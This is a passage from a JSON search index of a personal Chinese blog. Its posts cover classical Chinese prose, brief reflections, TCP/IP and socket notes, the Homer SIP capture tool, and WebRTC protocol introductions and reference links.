士大夫登徒先生站在楚王身旁,评论宋玉,说:宋玉这小伙子,长得很帅,但是非常八卦,而且好色,建议您不要让他进入后宫。\n楚王用登徒先生的话问宋玉。\n宋玉争辩说:我长得帅,这是父母生得好。我比较八卦,是因为我学识广博,口才好。至于说我好色,那是没有的事情。\n宋玉接着说:“天下的美女啊,没有比得上楚国的。楚国的美女,没有比得上臣里这个地方的。臣里的美女,没有比得上我邻居家的那个姑娘。”\n“那个姑娘,长得再高一点就太高了,长得再低一点就太低了。擦了粉底的话就太白,擦了腮红就太红了。眉毛像黑色的羽毛,肌肤像白雪一样。腰非常细,牙齿像贝壳一样白皙。”\n“她一笑,阳城和下蔡这两个地方的所有男人,都会被迷住。”\n“然而这个美女,天天登上我家的墙头偷窥我三年了,我至今都没有答应她让她作为我女朋友。”\n“登徒先生则不然,他老婆蓬头垢面、兔唇龅牙、走路佝偻、还长痔疮。但是登徒先生却非常喜欢她,和她生了5个孩子。大王你仔细想想,谁才是真正的好色?”","title":"登徒子好色赋"},{"content":"黄初三年,余朝京师,还济洛川。古人有言:斯水之神,名曰宓妃。感宋玉对楚王神女之事,遂作斯赋。其词曰:\n余从京域,言归东藩,背伊阙,越轘辕,经通谷,陵景山。日既西倾,车殆马烦。尔乃税驾乎蘅皋,秣驷乎芝田,容与乎阳林,流眄乎洛川。于是精移神骇,忽焉思散。俯则未察,仰以殊观。睹一丽人,于岩之畔。乃援御者而告之曰:“尔有觌于彼者乎?彼何人斯,若此之艳也!”御者对曰:“臣闻河洛之神,名曰宓妃。然则君王之所见,无乃是乎!其状若何?臣愿闻之。”\n余告之曰:其形也,翩若惊鸿,婉若游龙。荣曜秋菊,华茂春松。髣髴兮若轻云之蔽月,飘飖兮若流风之回雪。远而望之,皎若太阳升朝霞;迫而察之,灼若芙蕖出渌波。秾纤得中,修短合度。肩若削成,腰如约素。延颈秀项,皓质呈露。芳泽无加,铅华弗御。云髻峨峨,修眉联娟。丹唇外朗,皓齿内鲜。明眸善睐,靥辅承权。瓌姿艳逸,仪静体闲。柔情绰态,媚于语言。奇服旷世,骨像应图。披罗衣之璀粲兮,珥瑶碧之华琚。戴金翠之首饰,缀明珠以耀躯。践远游之文履,曳雾绡之轻裾。微幽兰之芳蔼兮,步踟蹰于山隅。于是忽焉纵体,以遨以嬉。左倚采旄,右荫桂旗。攘皓腕于神浒兮,采湍濑之玄芝。\n余情悦其淑美兮,心振荡而不怡。无良媒以接欢兮,托微波而通辞。愿诚素之先达兮,解玉佩以要之。嗟佳人之信修,羌习礼而明诗。抗琼珶以和予兮,指潜渊而为期。执眷眷之款实兮,惧斯灵之我欺。感交甫之弃言兮,怅犹豫而狐疑。收和颜而静志兮,申礼防以自持。\n于是洛灵感焉,徙倚彷徨。神光离合,乍阴乍阳。竦轻躯以鹤立,若将飞而未翔。践椒途之郁烈,步蘅薄而流芳。超长吟以永慕兮,声哀厉而弥长。尔乃众灵杂沓,命俦啸侣。或戏清流,或翔神渚,或采明珠,或拾翠羽。从南湘之二妃,携汉滨之游女。叹匏瓜之无匹兮,咏牵牛之独处。扬轻袿之猗靡兮,翳修袖以延伫。体迅飞凫,飘忽若神。**凌波微步,罗袜生尘。**动无常则,若危若安;进止难期,若往若还。转眄流精,光润玉颜。含辞未吐,气若幽兰。华容婀娜,令我忘餐。\n于是屏翳收风,川后静波。冯夷鸣鼓,女娲清歌。腾文鱼以警乘,鸣玉銮以偕逝。六龙俨其齐首,载云车之容裔。鲸鲵踊而夹毂,水禽翔而为卫。于是越北沚,过南冈,纡素领,回清扬。动朱唇以徐言,陈交接之大纲。恨人神之道殊兮,怨盛年之莫当。抗罗袂以掩涕兮,泪流襟之浪浪。悼良会之永绝兮,哀一逝而异乡。无微情以效爱兮,献江南之明珰。虽潜处于太阴,长寄心于君王。忽不悟其所舍,怅神宵而蔽光。\n于是背下陵高,足往神留。遗情想像,顾望怀愁。冀灵体之复形,御轻舟而上溯。浮长川而忘反,思绵绵而增慕。夜耿耿而不寐,沾繁霜而至曙。命仆夫而就驾,吾将归乎东路。揽騑辔以抗策,怅盘桓而不能去。\n","permalink":"https://wdd.js.org/posts/2019/11/ck3yzp/","summary":"黄初三年,余朝京师,还济洛川。古人有言:斯水之神,名曰宓妃。感宋玉对楚王神女之事,遂作斯赋。其词曰:\n余从京域,言归东藩,背伊阙,越轘辕,经通谷,陵景山。日既西倾,车殆马烦。尔乃税驾乎蘅皋,秣驷乎芝田,容与乎阳林,流眄乎洛川。于是精移神骇,忽焉思散。俯则未察,仰以殊观。睹一丽人,于岩之畔。乃援御者而告之曰:“尔有觌于彼者乎?彼何人斯,若此之艳也!”御者对曰:“臣闻河洛之神,名曰宓妃。然则君王之所见,无乃是乎!其状若何?臣愿闻之。”\n余告之曰:其形也,翩若惊鸿,婉若游龙。荣曜秋菊,华茂春松。髣髴兮若轻云之蔽月,飘飖兮若流风之回雪。远而望之,皎若太阳升朝霞;迫而察之,灼若芙蕖出渌波。秾纤得中,修短合度。肩若削成,腰如约素。延颈秀项,皓质呈露。芳泽无加,铅华弗御。云髻峨峨,修眉联娟。丹唇外朗,皓齿内鲜。明眸善睐,靥辅承权。瓌姿艳逸,仪静体闲。柔情绰态,媚于语言。奇服旷世,骨像应图。披罗衣之璀粲兮,珥瑶碧之华琚。戴金翠之首饰,缀明珠以耀躯。践远游之文履,曳雾绡之轻裾。微幽兰之芳蔼兮,步踟蹰于山隅。于是忽焉纵体,以遨以嬉。左倚采旄,右荫桂旗。攘皓腕于神浒兮,采湍濑之玄芝。\n余情悦其淑美兮,心振荡而不怡。无良媒以接欢兮,托微波而通辞。愿诚素之先达兮,解玉佩以要之。嗟佳人之信修,羌习礼而明诗。抗琼珶以和予兮,指潜渊而为期。执眷眷之款实兮,惧斯灵之我欺。感交甫之弃言兮,怅犹豫而狐疑。收和颜而静志兮,申礼防以自持。\n于是洛灵感焉,徙倚彷徨。神光离合,乍阴乍阳。竦轻躯以鹤立,若将飞而未翔。践椒途之郁烈,步蘅薄而流芳。超长吟以永慕兮,声哀厉而弥长。尔乃众灵杂沓,命俦啸侣。或戏清流,或翔神渚,或采明珠,或拾翠羽。从南湘之二妃,携汉滨之游女。叹匏瓜之无匹兮,咏牵牛之独处。扬轻袿之猗靡兮,翳修袖以延伫。体迅飞凫,飘忽若神。**凌波微步,罗袜生尘。**动无常则,若危若安;进止难期,若往若还。转眄流精,光润玉颜。含辞未吐,气若幽兰。华容婀娜,令我忘餐。\n于是屏翳收风,川后静波。冯夷鸣鼓,女娲清歌。腾文鱼以警乘,鸣玉銮以偕逝。六龙俨其齐首,载云车之容裔。鲸鲵踊而夹毂,水禽翔而为卫。于是越北沚,过南冈,纡素领,回清扬。动朱唇以徐言,陈交接之大纲。恨人神之道殊兮,怨盛年之莫当。抗罗袂以掩涕兮,泪流襟之浪浪。悼良会之永绝兮,哀一逝而异乡。无微情以效爱兮,献江南之明珰。虽潜处于太阴,长寄心于君王。忽不悟其所舍,怅神宵而蔽光。\n于是背下陵高,足往神留。遗情想像,顾望怀愁。冀灵体之复形,御轻舟而上溯。浮长川而忘反,思绵绵而增慕。夜耿耿而不寐,沾繁霜而至曙。命仆夫而就驾,吾将归乎东路。揽騑辔以抗策,怅盘桓而不能去。","title":"洛神赋"},{"content":"有两种选择,要么被忽悠成韭菜被别人割,要么割别热的韭菜。\n","permalink":"https://wdd.js.org/posts/2019/11/blqt1k/","summary":"有两种选择,要么被忽悠成韭菜被别人割,要么割别热的韭菜。","title":"割韭菜"},{"content":" “狙公赋芧,曰:\u0026lsquo;朝三而暮四。\u0026lsquo;众狙皆怒。曰:\u0026lsquo;然则朝四而暮三。\u0026lsquo;众狙皆悦。名实未亏而喜怒为用,亦因是也。《庄子—齐物论》\n有个人养猴子,每天早上喂给每个猴子三颗枣,下午每个猴子喂四颗枣。\n有一天他突然想搞点事情,就对猴子说:从今以后,每天早上每人给你们四颗枣,下午每人给你们三颗枣,你们说好不好?\n猴子们上蹿下跳,怒发冲冠,生气的说:不行!不行!那怎么行呢?\n养猴子人摆摆手,和气的说:好吧,好吧,还按照以前方式来。\n猴子们很满意,笼子里充满祥和的空气~\n","permalink":"https://wdd.js.org/posts/2019/11/urkvnz/","summary":"“狙公赋芧,曰:\u0026lsquo;朝三而暮四。\u0026lsquo;众狙皆怒。曰:\u0026lsquo;然则朝四而暮三。\u0026lsquo;众狙皆悦。名实未亏而喜怒为用,亦因是也。《庄子—齐物论》\n有个人养猴子,每天早上喂给每个猴子三颗枣,下午每个猴子喂四颗枣。\n有一天他突然想搞点事情,就对猴子说:从今以后,每天早上每人给你们四颗枣,下午每人给你们三颗枣,你们说好不好?\n猴子们上蹿下跳,怒发冲冠,生气的说:不行!不行!那怎么行呢?\n养猴子人摆摆手,和气的说:好吧,好吧,还按照以前方式来。\n猴子们很满意,笼子里充满祥和的空气~","title":"朝三暮四"},{"content":" 冷风如刀,以大地为砧板,视众生为鱼肉。万里飞雪,将苍穹作洪炉,溶万物为白银 《多情剑客无情剑》\n","permalink":"https://wdd.js.org/posts/2019/11/kug5fo/","summary":"冷风如刀,以大地为砧板,视众生为鱼肉。万里飞雪,将苍穹作洪炉,溶万物为白银 《多情剑客无情剑》","title":"众生鱼肉"},{"content":"我以前看过王志刚的一本书《第三种生存》,觉得蛮有意思的。\n依赖于权利阶层。例如当官 依赖于财富阶层。例如打工 大部分人其实都在依赖权利阶层或者财富阶层在生存,能够跳出的人这两种生存方式的,称之为第三种生存。\n第三种生存方式,是讲自己打造成某个领域中专家级别的人物。\n称为专家,称为大多数中的少数人。物以稀为贵,人亦如此。\n","permalink":"https://wdd.js.org/posts/2019/11/gn4aak/","summary":"我以前看过王志刚的一本书《第三种生存》,觉得蛮有意思的。\n依赖于权利阶层。例如当官 依赖于财富阶层。例如打工 大部分人其实都在依赖权利阶层或者财富阶层在生存,能够跳出的人这两种生存方式的,称之为第三种生存。\n第三种生存方式,是讲自己打造成某个领域中专家级别的人物。\n称为专家,称为大多数中的少数人。物以稀为贵,人亦如此。","title":"第三种生存"},{"content":"分层 应用程序一般处理应用层的\n------------------------------------------------------------ 应用层 # Telnet, FTP, Email, MySql\t| 应用程序细节\t| 用户进程 ------------------------------------------------------------ 运输层 # TCP, UDP | 内核(处理通信细节) 端到端通信 | ------------------------------------------| 网络层 # IP, ICMP, IGMP\t| 逐跳通信,处理分组相关的活动,例如分组选路| ------------------------------------------| 链路层 # 设备驱动程序 接口卡\t| 处理物理信号\t| ------------------------------------------------------------ 应用层和传输层使用端到端的协议 网络层提供逐跳的协议 网桥在链路层来连接网络 路由器在网络层连接网络 以太网数据帧的物理特性是长度必须在46-1500字节之间 封装 以太网帧用来封装IP数据报。\nIP数据报 = IP首部(20字节) + TCP首部(20字节) + 应用数据 # 针对TCP IP数据报 = IP首部(20字节) + UDP首部(8字节) + 应用数据 # 针对UDP 以太网帧 = 以太网首部(14字节) + IP数据报(46-1500字节) + 以太网尾部(4字节) IP数据报最大为1500字节,减去20字节IP首部,8字节UDP首部,留给UDP应用数据的只有1472字节。\n","permalink":"https://wdd.js.org/network/ir1i82/","summary":"分层 应用程序一般处理应用层的\n------------------------------------------------------------ 应用层 # Telnet, FTP, Email, MySql\t| 应用程序细节\t| 用户进程 ------------------------------------------------------------ 运输层 # TCP, UDP | 内核(处理通信细节) 端到端通信 | ------------------------------------------| 网络层 # IP, ICMP, IGMP\t| 逐跳通信,处理分组相关的活动,例如分组选路| ------------------------------------------| 链路层 # 设备驱动程序 接口卡\t| 处理物理信号\t| ------------------------------------------------------------ 应用层和传输层使用端到端的协议 网络层提供逐跳的协议 网桥在链路层来连接网络 路由器在网络层连接网络 以太网数据帧的物理特性是长度必须在46-1500字节之间 封装 以太网帧用来封装IP数据报。\nIP数据报 = IP首部(20字节) + TCP首部(20字节) + 应用数据 # 针对TCP IP数据报 = IP首部(20字节) + UDP首部(8字节) + 应用数据 # 针对UDP 以太网帧 = 以太网首部(14字节) + IP数据报(46-1500字节) + 以太网尾部(4字节) IP数据报最大为1500字节,减去20字节IP首部,8字节UDP首部,留给UDP应用数据的只有1472字节。","title":"1 概述"},{"content":"相比于sngrep, Homer能够保存从历史记录中搜索SIP包信息。除此以外,Homer可以很方便的与OpenSIPS或FS进行集成。\n最精简版本的Homer部署需要三个服务。\npostgres 数据库,用来存储SIP信息 heplify-server 用来处理Hep消息,存储到数据库 homer-app 前端搜索查询界面 这三个服务都可以用docker镜像的方式部署,非常方便。\n说实话:homer实际上并不好用。你可以对比一下siphub就知道了。\n参考资料 https://blog.opensips.org/2017/03/22/capturing-beyond-sip/https://www.opensips.org/Documentation/Tutorials-Tracing\n","permalink":"https://wdd.js.org/opensips/tools/homer/","summary":"相比于sngrep, Homer能够保存从历史记录中搜索SIP包信息。除此以外,Homer可以很方便的与OpenSIPS或FS进行集成。\n最精简版本的Homer部署需要三个服务。\npostgres 数据库,用来存储SIP信息 heplify-server 用来处理Hep消息,存储到数据库 homer-app 前端搜索查询界面 这三个服务都可以用docker镜像的方式部署,非常方便。\n说实话:homer实际上并不好用。你可以对比一下siphub就知道了。\n参考资料 https://blog.opensips.org/2017/03/22/capturing-beyond-sip/https://www.opensips.org/Documentation/Tutorials-Tracing","title":"homer: 统一的sip包集中处理工具"},{"content":"1 面向连接和面向非连接的区别? 面向连接与面向非连接并不是指的物理介质,而是指的分组数据包。而实际上,连接只是一个虚拟的概念。\n数据在发送前,会被分组发送。对于面向连接的协议来说,每个分组之间都有顺序的,分组会存储自己的位置信息。\n可以理解在同一时间只维持一段关系。\n面向非连接协议,分组直接并无任何关系,每个分组都是相互独立的。可以理解为脚踏多条船。\n","permalink":"https://wdd.js.org/network/kttu4i/","summary":"1 面向连接和面向非连接的区别? 面向连接与面向非连接并不是指的物理介质,而是指的分组数据包。而实际上,连接只是一个虚拟的概念。\n数据在发送前,会被分组发送。对于面向连接的协议来说,每个分组之间都有顺序的,分组会存储自己的位置信息。\n可以理解在同一时间只维持一段关系。\n面向非连接协议,分组直接并无任何关系,每个分组都是相互独立的。可以理解为脚踏多条船。","title":"技巧1"},{"content":"套接字API SOCKET socket(int domain, int type, int protocol) Socket API和协议无关,即可以用来创建Socket,无论是TCP还是UDP,还是进程间的通信,都可以用这个接口创建。\ndomain 表示通信域,最长见的有以下两个域 AF_INET 因特网通信 AF_LOCAL 进程间通信 type 表示套接字的类型 SOCK_STREAM 可靠的、全双工、面向连接的,实际上就是我们熟悉的TCP SOCK_DGRAM 不可靠、尽力而为的,无连接的。实际上指的就是UDP SOCK_RAW 允许对IP层的数据进行访问。用于特殊目的,例如ICMP protocol 表示具体通信协议 TCP/IP 本自同根生!\n","permalink":"https://wdd.js.org/network/base-socket/","summary":"套接字API SOCKET socket(int domain, int type, int protocol) Socket API和协议无关,即可以用来创建Socket,无论是TCP还是UDP,还是进程间的通信,都可以用这个接口创建。\ndomain 表示通信域,最长见的有以下两个域 AF_INET 因特网通信 AF_LOCAL 进程间通信 type 表示套接字的类型 SOCK_STREAM 可靠的、全双工、面向连接的,实际上就是我们熟悉的TCP SOCK_DGRAM 不可靠、尽力而为的,无连接的。实际上指的就是UDP SOCK_RAW 允许对IP层的数据进行访问。用于特殊目的,例如ICMP protocol 表示具体通信协议 TCP/IP 本自同根生!","title":"基本套接字API回顾"},{"content":"","permalink":"https://wdd.js.org/posts/2019/11/bhbmum/","summary":"","title":"所有的古镇都是一个样[todo]"},{"content":" 今天打开语雀,发现已经有了会员功能。说实在的,相比普通用户,会员的优势并不大。除非你是哪种重度文字控患者,10个知识库并不够你用了。\n我在出现会员服务之前,已经有了多于10个知识库。\n相比于免费服务,我更喜欢付费的服务。免费的服务永远是最贵的服务。\n很多人,可以买爱奇艺的会员、优酷视频、腾讯视频、京东会员,但是往往对于能够真正提升自己能力的投资,往往安于免费,不忍付出。\n除非是动辄几千的会员,我会考虑自己是否真正需要。一百左右的年费会员,在上海,也就是喝三四杯奶茶的价钱。\n所以,我就买了会员。\n买了会员有什么感觉,感觉我可能会多创建几个知识库吧。\n","permalink":"https://wdd.js.org/posts/2019/11/gonmzq/","summary":"今天打开语雀,发现已经有了会员功能。说实在的,相比普通用户,会员的优势并不大。除非你是哪种重度文字控患者,10个知识库并不够你用了。\n我在出现会员服务之前,已经有了多于10个知识库。\n相比于免费服务,我更喜欢付费的服务。免费的服务永远是最贵的服务。\n很多人,可以买爱奇艺的会员、优酷视频、腾讯视频、京东会员,但是往往对于能够真正提升自己能力的投资,往往安于免费,不忍付出。\n除非是动辄几千的会员,我会考虑自己是否真正需要。一百左右的年费会员,在上海,也就是喝三四杯奶茶的价钱。\n所以,我就买了会员。\n买了会员有什么感觉,感觉我可能会多创建几个知识库吧。","title":"买了语雀会员是怎样体验?"},{"content":"WebRTC 功能 音频视频通话 视频会议 数据传输 WebRTC 架构 对等实体之间通过信令服务传递信令 对等实体之间的媒体流可以直接传递,无需中间服务器 内部结构 紫色部分是Web开发者API层 蓝色实线部分是面向浏览器厂商的API层 蓝色虚线部分浏览器厂商可以自定义实现 WebRTC有三个模块:\nVoice Engine(音频引擎) Voice Engine包含iSAC/iLBC Codec(音频编解码器,前者是针对宽带和超宽带,后者是针对窄带) NetEQ for voice(处理网络抖动和语音包丢失) Echo Canceler(回声消除器)/ Noise Reduction(噪声抑制) Video Engine(视频引擎) VP8 Codec(视频图像编解码器) Video jitter buffer(视频抖动缓冲器,处理视频抖动和视频信息包丢失) Image enhancements(图像质量增强) Transport SRTP(安全的实时传输协议,用以音视频流传输) Multiplexing(多路复用) P2P,STUN+TURN+ICE(用于NAT网络和防火墙穿越的) 除此之外,安全传输可能还会用到DTLS(数据报安全传输),用于加密传输和密钥协商 整个WebRTC通信是基于UDP的 WebRTC 如何通信 getUserMedia用来捕获本地的语音流或者视频流 RTCPeerConnection用来代表WebRTC链接,用来处理对等实体之间的流数据 RTCDataChannel 用来传递各种数据 WebRTC 的核心组件 音视频引擎:OPUS、VP8 / VP9、H264 传输层协议:底层传输协议为 UDP 媒体协议:SRTP / SRTCP 数据协议:DTLS / SCTP P2P 内网穿透:STUN / TURN / ICE / Trickle ICE 信令与 SDP 协商:HTTP / WebSocket / SIP、 Offer Answer 模型 WebRTC 音频和视频引擎 最底层是硬件设备,上面是音频捕获模块和视频捕获模块 中间部分为音视频引擎。音频引擎负责音频采集和传输,具有降噪、回声消除等功能。视频引擎负责网络抖动优化,互联网传输编解码优化 在音视频引擎之上是 一套 C++ API,在 C++ 的 API 之上是提供给浏览器的Javascript API WebRTC 底层协议 WebRTC 核心的协议都是在右侧基于 UDP 基础上搭建起来的 其中,ICE、STUN、TURN 用于内网穿透, 解决了获取与绑定外网映射地址,以及 keep alive 机制 DTLS 用于对传输内容进行加密,可以看做是 UDP 版的 TLS。由于 WebRTC 对安全比较重视,这一层是必须的。所有WebRTC组件都必须加密,并且其JavaScript API只能用于安全源(HTTPS或本地主机)。信令机制并不是由WebRTC标准定义的,所以您必须确保使用安全协议。 SRTP 与 SRTCP 是对媒体数据的封装与传输控制协议 SCTP 是流控制传输协议,提供类似 TCP 的特性,SCTP 可以基于 UDP 上构建,在 WebRTC 里是在 DTLS 协议之上 RTCPeerConnection 用来建立和维护端到端连接,并提供高效的音视频流传输 RTCDataChannel 用来支持端到端的任意二进制数据传输 WebRTC 协议栈解释 ICE:互动式连接建立(RFC 5245) STUN:用于NAT的会话遍历实用程序(RFC 5389) TURN:在NAT周围使用继电器进行遍历(RFC 5766) SDP:会话描述协议(RFC 4566) DTLS:数据报传输层安全性(RFC 6347) SCTP:流控制传输协议(RFC 4960) SRTP:安全实时传输协议(RFC 3711) 浏览器和某些非浏览器之间的呼叫,有些时候以为没有DTLS指纹,而导致呼叫失败。如下图使用JsSIP, 一个sipPhone和WebRTC之间的呼叫,因为没有携带DTLS指纹而导致呼叫失败。\nemit \u0026ldquo;peerconnection:setremotedescriptionfailed\u0026rdquo; [error**:DOMException:**** Failed to execute \u0026lsquo;setRemoteDescription\u0026rsquo; on \u0026lsquo;RTCPeerConnection\u0026rsquo;:**** Failed to set remote offer sdp****:**** Called with SDP without DTLS fingerprint.**\n一个完整的SIP INVITE信令。其中a=fingerprint:sha-256字段表示DTLS指纹。\na=fingerprint:sha-256 74:CD:F4:A0:3B:46:01:1C:0C:5D:04:D0:17:E5:A4:A1:04:35:97:1C:34:A3:61:60:79:52:02:F3:05:9E:7D:FE\nSDP: Session Description Protocol SDP协议用来协商两个SIP UA之间能力,例如媒体编解码能力。sdp协议举例。sdp协议的详细介绍可以参考 RFC4566\nv=0 o=- 7158718066157017333 2 IN IP4 127.0.0.1 s=- t=0 0 a=group:BUNDLE 0 a=msid-semantic: WMS byn72RFJBCUzdSPhnaBU4vSz7LFwfwNaF2Sy m=audio 64030 UDP/TLS/RTP/SAVPF 111 103 104 9 0 8 106 105 13 110 112 113 126 c=IN IP4 192.168.2.180 Protocol Version (\u0026ldquo;v=\u0026rdquo;) Origin (\u0026ldquo;o=\u0026rdquo;) Session Name (\u0026ldquo;s=\u0026rdquo;) Session Information (\u0026ldquo;i=\u0026rdquo;) URI (\u0026ldquo;u=\u0026rdquo;) Email Address and Phone Number (\u0026ldquo;e=\u0026rdquo; and \u0026ldquo;p=\u0026rdquo;) Connection Data (\u0026ldquo;c=\u0026rdquo;) Bandwidth (\u0026ldquo;b=\u0026rdquo;) Timing (\u0026ldquo;t=\u0026rdquo;) Repeat Times (\u0026ldquo;r=\u0026rdquo;) Time Zones (\u0026ldquo;z=\u0026rdquo;) Encryption Keys (\u0026ldquo;k=\u0026rdquo;) Attributes (\u0026ldquo;a=\u0026rdquo;) Media Descriptions (\u0026ldquo;m=\u0026rdquo;) 加密 WebRTC对安全性是要求非常高的。无论是信令还是与语音流,WebRTC要求信息传递必须加密。\n数据流使用DTLS协议 媒体流使用SRTP JavaScript API getUserMedia():捕捉音频和视频 RTCPeerConnection:在用户之间流式传输音频和视频 RTCDataChannel:在用户之间传输数据 MediaRecorder:录制音频和视频 参考 WebRTC官网 WebRTC中文网 一步一步学习WebRTC A Study of WebRTC Security ","permalink":"https://wdd.js.org/opensips/ch9/notes/","summary":"WebRTC 功能 音频视频通话 视频会议 数据传输 WebRTC 架构 对等实体之间通过信令服务传递信令 对等实体之间的媒体流可以直接传递,无需中间服务器 内部结构 紫色部分是Web开发者API层 蓝色实线部分是面向浏览器厂商的API层 蓝色虚线部分浏览器厂商可以自定义实现 WebRTC有三个模块:\nVoice Engine(音频引擎) Voice Engine包含iSAC/iLBC Codec(音频编解码器,前者是针对宽带和超宽带,后者是针对窄带) NetEQ for voice(处理网络抖动和语音包丢失) Echo Canceler(回声消除器)/ Noise Reduction(噪声抑制) Video Engine(视频引擎) VP8 Codec(视频图像编解码器) Video jitter buffer(视频抖动缓冲器,处理视频抖动和视频信息包丢失) Image enhancements(图像质量增强) Transport SRTP(安全的实时传输协议,用以音视频流传输) Multiplexing(多路复用) P2P,STUN+TURN+ICE(用于NAT网络和防火墙穿越的) 除此之外,安全传输可能还会用到DTLS(数据报安全传输),用于加密传输和密钥协商 整个WebRTC通信是基于UDP的 WebRTC 如何通信 getUserMedia用来捕获本地的语音流或者视频流 RTCPeerConnection用来代表WebRTC链接,用来处理对等实体之间的流数据 RTCDataChannel 用来传递各种数据 WebRTC 的核心组件 音视频引擎:OPUS、VP8 / VP9、H264 传输层协议:底层传输协议为 UDP 媒体协议:SRTP / SRTCP 数据协议:DTLS / SCTP P2P 内网穿透:STUN / TURN / ICE / Trickle ICE 信令与 SDP 协商:HTTP / WebSocket / SIP、 Offer Answer 模型 WebRTC 音频和视频引擎 最底层是硬件设备,上面是音频捕获模块和视频捕获模块 中间部分为音视频引擎。音频引擎负责音频采集和传输,具有降噪、回声消除等功能。视频引擎负责网络抖动优化,互联网传输编解码优化 在音视频引擎之上是 一套 C++ API,在 C++ 的 API 之上是提供给浏览器的Javascript API WebRTC 底层协议 WebRTC 核心的协议都是在右侧基于 UDP 基础上搭建起来的 其中,ICE、STUN、TURN 用于内网穿透, 解决了获取与绑定外网映射地址,以及 keep alive 机制 DTLS 用于对传输内容进行加密,可以看做是 UDP 版的 TLS。由于 WebRTC 对安全比较重视,这一层是必须的。所有WebRTC组件都必须加密,并且其JavaScript API只能用于安全源(HTTPS或本地主机)。信令机制并不是由WebRTC标准定义的,所以您必须确保使用安全协议。 SRTP 与 SRTCP 是对媒体数据的封装与传输控制协议 SCTP 是流控制传输协议,提供类似 TCP 的特性,SCTP 可以基于 UDP 上构建,在 WebRTC 里是在 DTLS 协议之上 RTCPeerConnection 用来建立和维护端到端连接,并提供高效的音视频流传输 RTCDataChannel 用来支持端到端的任意二进制数据传输 WebRTC 协议栈解释 ICE:互动式连接建立(RFC 5245) STUN:用于NAT的会话遍历实用程序(RFC 5389) TURN:在NAT周围使用继电器进行遍历(RFC 5766) SDP:会话描述协议(RFC 4566) DTLS:数据报传输层安全性(RFC 6347) SCTP:流控制传输协议(RFC 4960) SRTP:安全实时传输协议(RFC 3711) 浏览器和某些非浏览器之间的呼叫,有些时候以为没有DTLS指纹,而导致呼叫失败。如下图使用JsSIP, 一个sipPhone和WebRTC之间的呼叫,因为没有携带DTLS指纹而导致呼叫失败。","title":"WebRTC简介"},{"content":"目前在做基于WebRTC的语音和视频终端,语音和视频通话的质量都不错。感谢WebRTC,站在巨人的肩膀上,我们可以看得更远。\nWebRTC浏览器兼容性 github demos 下面两个都是github项目,项目中有各种WebRTC的demo。除了demo之外,这两个项目的issuese也是非常值得看的,可以解决常见的问题\nhttps://webrtc.github.io/samples/ https://github.com/muaz-khan/WebRTC-Experiment 相关资料网站 webrtc官网: https://webrtc.org/ webrtchacks: https://webrtchacks.com/ webrtc官网: https://webrtc.org.cn/ webrtc安全相关: http://webrtc-security.github.io/ webrtc谷歌开发者教程: https://codelabs.developers.google.com/codelabs/webrtc-web/ sdp for webrtc https://tools.ietf.org/id/draft-nandakumar-rtcweb-sdp-01.html 各种资料 https://webrtc.org/start/ https://www.w3.org/TR/webrtc/ 浏览器内核 webkit官网:https://webkit.org/ WebRTC相关库 webrtc-adapter https://github.com/webrtchacks/adapter WebRTC周边js库 库 地址 Addlive http://www.addlive.com/platform-overview/ Apidaze https://developers.apidaze.io/webrtc Bistri http://developers.bistri.com/webrtc-sdk/#js-sdk Crocodile https://www.crocodilertc.net/documentation/javascript/ EasyRTC http://www.easyrtc.com/docs/ Janus http://janus.conf.meetecho.com/docs/JS.html JsSIP http://jssip.net/documentation/ Openclove http://developer.openclove.com/docs/read/ovxjs_api_doc Oracle http://docs.oracle.com/cd/E40972_01/doc.70/e49239/index.html Peerjs http://peerjs.com/docs/#api Phono http://phono.com/docs Plivo https://plivo.com/docs/sdk/web/ Pubnub http://www.pubnub.com/docs/javascript/javascript-sdk.html Quobis https://quobis.atlassian.net/wiki/display/QoffeeSIP/API SimpleWebRTC from \u0026amp;Yet http://simplewebrtc.com/ SIPML5 http://sipml5.org/docgen/symbols/SIPml.html TenHands https://www.tenhands.net/developer/docs.htm TokBox http://tokbox.com/opentok Twilio http://www.twilio.com/client/api Voximplant http://voximplant.com/docs/references/websdk/ Vline https://vline.com/developer/docs/vline.js/ Weemo http://docs.weemo.com/js/ Xirsys http://xirsys.com/_static_content/xirsys.com/docs/ Xsockets.net http://xsockets.net/docs/javascript-client-api VoIP/PSTN https://kamailio.org https://freeswitch.org/ 值得关注的人 https://github.com/muaz-khan https://github.com/chadwallacehart https://github.com/fippo WebRTC主题 github上webrtc主题相关的仓库,干货非常多 https://github.com/topics/webrtc\n相关文章 guide-to-safari-webrtc WebKit: On the Road to WebRTC 1.0, Including VP8 whats-in-a-webrtc-javascript-library ","permalink":"https://wdd.js.org/opensips/ch9/webrtc-ref/","summary":"目前在做基于WebRTC的语音和视频终端,语音和视频通话的质量都不错。感谢WebRTC,站在巨人的肩膀上,我们可以看得更远。\nWebRTC浏览器兼容性 github demos 下面两个都是github项目,项目中有各种WebRTC的demo。除了demo之外,这两个项目的issuese也是非常值得看的,可以解决常见的问题\nhttps://webrtc.github.io/samples/ https://github.com/muaz-khan/WebRTC-Experiment 相关资料网站 webrtc官网: https://webrtc.org/ webrtchacks: https://webrtchacks.com/ webrtc官网: https://webrtc.org.cn/ webrtc安全相关: http://webrtc-security.github.io/ webrtc谷歌开发者教程: https://codelabs.developers.google.com/codelabs/webrtc-web/ sdp for webrtc https://tools.ietf.org/id/draft-nandakumar-rtcweb-sdp-01.html 各种资料 https://webrtc.org/start/ https://www.w3.org/TR/webrtc/ 浏览器内核 webkit官网:https://webkit.org/ WebRTC相关库 webrtc-adapter https://github.com/webrtchacks/adapter WebRTC周边js库 库 地址 Addlive http://www.addlive.com/platform-overview/ Apidaze https://developers.apidaze.io/webrtc Bistri http://developers.bistri.com/webrtc-sdk/#js-sdk Crocodile https://www.crocodilertc.net/documentation/javascript/ EasyRTC http://www.easyrtc.com/docs/ Janus http://janus.conf.meetecho.com/docs/JS.html JsSIP http://jssip.net/documentation/ Openclove http://developer.openclove.com/docs/read/ovxjs_api_doc Oracle http://docs.oracle.com/cd/E40972_01/doc.70/e49239/index.html Peerjs http://peerjs.com/docs/#api Phono http://phono.com/docs Plivo https://plivo.com/docs/sdk/web/ Pubnub http://www.pubnub.com/docs/javascript/javascript-sdk.html Quobis https://quobis.atlassian.net/wiki/display/QoffeeSIP/API SimpleWebRTC from \u0026amp;Yet http://simplewebrtc.com/ SIPML5 http://sipml5.org/docgen/symbols/SIPml.html TenHands https://www.tenhands.net/developer/docs.htm TokBox http://tokbox.","title":"WebRTC学习资料分享"},{"content":"1. OpenSIPS架构 OpenSIPS主要有两部分构成,\ncore: 提供底层工具、接口、资源 